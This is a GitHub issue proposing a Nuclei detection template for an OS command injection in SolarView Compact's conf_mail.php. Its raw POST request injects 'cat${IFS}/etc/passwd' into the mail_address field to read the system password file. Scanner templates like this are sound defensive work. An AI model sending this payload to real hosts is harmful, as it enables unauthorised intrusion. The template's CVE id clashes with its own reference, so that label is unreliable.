### ISSUE TITLE
CVE-2022-30525

### ISSUE THREAD

**Issue by badboycxcc** [projectdiscovery/nuclei-templates#4428]
### Template Information:

SolarView Compact ver.6.00 was discovered to contain a command injection vulnerability via conf_mail.php.

### Nuclei Template:

```yaml
id: CVE-2022-30525

info:
  name: SolarView Compact 6.0 - OS Command Injection
  author: remote
  severity: high
  reference: 
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29303
    - https://www.exploit-db.com/exploits/50940
  tags: cve,cve2022
  classification:
    cve-id: CVE-2022-30525

requests:
  - raw:
      - |
        POST /conf_mail.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        
        mail_address=%3B{{exploit}}%3B&button=%83%81%81%5B%83%8B%91%97%90M
        
        
    payloads:
      exploit:
        - "cat${IFS}/etc/passwd"
    attack: pitchfork
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0"
```
